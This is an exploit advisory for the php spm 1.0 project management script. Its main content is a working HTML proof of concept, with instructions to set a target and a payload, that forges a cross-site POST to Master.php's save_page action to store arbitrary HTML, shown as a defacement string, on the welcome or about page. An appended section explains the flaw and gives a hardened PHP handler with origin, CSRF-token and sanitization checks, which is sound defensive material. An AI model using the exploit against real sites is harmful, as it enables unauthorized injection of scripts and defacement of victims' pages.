=============================================================================================================================================
| # Title : php spm 1.0 WYSIWYG code injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip |
=============================================================================================================================================
PoC:
[+] This payload injects code of your choice into the welcome or about page through TinyMCE (a WYSIWYG editor, version 7.3.0), which posts its content to the file /php-spms/classes/Master.php.
[+] Line 86: set your target.
[+] Line 27: set your payload in <textarea name="page[welcome]"> ===> you can use welcome or about as the page key.
[+] Save the payload as poc.html.
[+] Payload:
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome Page Editor</title>
  <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>
</head>
<body>
  <main id="main" class="main">
    <div class="pagetitle">
      <h1>Welcome Page</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item active">Welcome Page</li>
        </ol>
      </nav>
    </div>
    <div id="msg-container"></div>
    <div class="card rounded-0">
      <div class="card-body rounded-0 pt-4">
        <div class="container-fluid">
          <form id="page-form">
            <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>
          </form>
        </div>
      </div>
      <div class="card-footer">
        <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">
          <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>
        </div>
      </div>
    </div>
    <div id="loader" style="display:none;">Loading...</div>
    <div id="toast"></div>
    <script>
      // Initialize TinyMCE
      tinymce.init({
        selector: 'textarea.tinymce-editor',
        height: 300,
        menubar: false,
        plugins: [
          'advlist autolink lists link image charmap print preview anchor',
          'searchreplace visualblocks code fullscreen',
          'insertdatetime media table paste code help wordcount'
        ],
        toolbar: 'undo redo | formatselect | bold italic backcolor | ' +
          'alignleft aligncenter alignright alignjustify | ' +
          'bullist numlist outdent indent | removeformat | help'
      });

      // Loader functions
      function start_loader() {
        document.getElementById('loader').style.display = 'block';
      }
      function end_loader() {
        document.getElementById('loader').style.display = 'none';
      }

      // Toast function
      function showMessage(message, type) {
        const messageDiv = document.getElementById('toast');
        messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;
        setTimeout(() => {
          messageDiv.innerHTML = '';
        }, 3000);
      }

      // Form submit event listener
      document.getElementById('page-form').addEventListener('submit', function(e) {
        e.preventDefault(); // Prevent page reload
        // Start loader
        start_loader();
        const formData = new FormData(this); // Get form data
        const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object
        // Set up request
        xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);
        // Handle response
        xhr.onreadystatechange = function() {
          if (xhr.readyState === XMLHttpRequest.DONE) {
            end_loader();
            if (xhr.status === 200) {
              const response = JSON.parse(xhr.responseText);
              if (response.status === 'success') {
                showMessage('Page updated successfully!', 'success');
                location.reload(); // Reload the page if successful
              } else if (response.status === 'failed' && response.msg) {
                showMessage(response.msg, 'error');
              } else {
                showMessage('An unknown error occurred.', 'error');
              }
            } else {
              showMessage('Error: ' + xhr.statusText, 'error');
            }
          }
        };
        // Send the request
        xhr.send(formData);
      });
    </script>
  </main>
</body>
</html>
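The PoC above works because the save_page action accepts a POST from any origin, carrying the victim's session cookie, and stores the editor HTML as-is. As an added example (not php-spms code, and not a patch from the vendor), this is what a hardened handler for that action looks like; the session key csrf_token and the store_page() persistence helper are hypothetical names.

```php
<?php
// Added example, not php-spms code: a hardened save_page handler that rejects the cross-site
// POST the PoC sends and allow-lists the stored HTML. 'csrf_token' and store_page() are hypothetical.
session_start();
const PAGE_KEYS     = ['welcome', 'about'];
const ALLOWED_TAGS  = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'a', 'img'];
const ALLOWED_ATTRS = ['href', 'src', 'alt', 'title'];

// Check 1: browsers send Origin on POST; it must match this host and the form must carry
// the per-session CSRF token (constant-time compare). The PoC page supplies neither.
function same_site_request(array $server, array $post, array $session): bool {
    $scheme   = (($server['HTTPS'] ?? 'off') === 'on') ? 'https://' : 'http://';
    $originOk = ($server['HTTP_ORIGIN'] ?? '') === $scheme . ($server['HTTP_HOST'] ?? '');
    $tokenOk  = isset($session['csrf_token'], $post['csrf_token'])
        && hash_equals($session['csrf_token'], (string) $post['csrf_token']);
    return $originOk && $tokenOk;
}
// Check 2: keep only allow-listed elements and attributes, so <script>, <iframe>,
// on* handlers and javascript: URLs never reach the stored welcome/about page.
function sanitize_html(string $html): string {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    $root = $doc->documentElement;                       // the wrapper <div>
    foreach (iterator_to_array($root->getElementsByTagName('*')) as $el) {
        if (!in_array(strtolower($el->nodeName), ALLOWED_TAGS, true)) {
            $el->parentNode->removeChild($el);           // drops the element and its subtree
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {
            $unsafe = !in_array(strtolower($attr->name), ALLOWED_ATTRS, true)
                || preg_match('/^\s*(javascript|vbscript|data)\s*:/i', $attr->value);
            if ($unsafe) { $el->removeAttribute($attr->name); }
        }
    }
    $out = '';
    foreach ($root->childNodes as $child) { $out .= $doc->saveHTML($child); }
    return $out;
}
if (!same_site_request($_SERVER, $_POST, $_SESSION)) {
    http_response_code(403);
    exit(json_encode(['status' => 'failed', 'msg' => 'Cross-site request rejected']));
}
foreach ((array) ($_POST['page'] ?? []) as $key => $html) {
    if (!in_array($key, PAGE_KEYS, true)) { continue; }  // Check 3: only known page keys
    store_page($key, sanitize_html((string) $html));     // hypothetical persistence helper
}
echo json_encode(['status' => 'success']);
```

Setting the session cookie with SameSite=Lax or Strict adds a browser-side layer on top of the Origin and token checks, and the sanitizer should also run when the page is rendered, since content stored before the fix stays in the database.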
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================